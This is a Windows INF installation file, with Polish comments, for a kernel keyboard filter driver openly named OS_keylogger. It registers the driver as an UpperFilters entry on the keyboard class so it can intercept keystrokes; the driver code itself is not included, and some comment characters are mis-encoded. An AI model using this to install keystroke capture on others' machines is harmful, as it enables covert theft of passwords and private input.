;
; OS_keylogger.inf
;
; Instalacja sterownika filtra klawiatury (Keyboard Class Filter)
;

[Version]
Signature   = "$WINDOWS NT$"
Class       = Keyboard
ClassGuid   = {4d36e96b-e325-11ce-bfc1-08002be10318}
Provider    = %ProviderName%
DriverVer   = 12/29/2025,1.0.0.0
CatalogFile = OS_keylogger.cat
PnpLockdown = 1

[DestinationDirs]
DefaultDestDir = 12 ; Katalog C:\Windows\System32\drivers

[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]
OS_keylogger.sys = 1,,

; ================= Sekcja Instalacji (DefaultInstall) =================

[DefaultInstall.NTamd64]
CopyFiles = DriverFiles

[DefaultInstall.NTamd64.Services]
AddService = OS_keylogger,, Service_Inst

[DefaultInstall.NTamd64.HW]
AddReg = Filter_AddReg

; ================= Kopiowanie Plików =================

[DriverFiles]
OS_keylogger.sys

; ================= Rejestracja Filtra =================

[Filter_AddReg]
; Klucz: HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e96b...}
; Wartoœæ: UpperFilters
; Typ: REG_MULTI_SZ_APPEND (0x00010008)
HKR,,"UpperFilters",0x00010008,"OS_keylogger"

; ================= Konfiguracja Us³ugi =================

[Service_Inst]
DisplayName    = %ServiceDesc%
ServiceType    = 1               ; SERVICE_KERNEL_DRIVER
StartType      = 3               ; SERVICE_DEMAND_START
ErrorControl   = 1               ; SERVICE_ERROR_NORMAL
ServiceBinary  = %12%\OS_keylogger.sys

; ================= Ci¹gi Znaków (Strings) =================

[Strings]
ProviderName = "TwojaNazwa"
DiskName     = "Dysk instalacyjny OS_keylogger"
ServiceDesc  = "OS_keylogger Keyboard Filter Driver"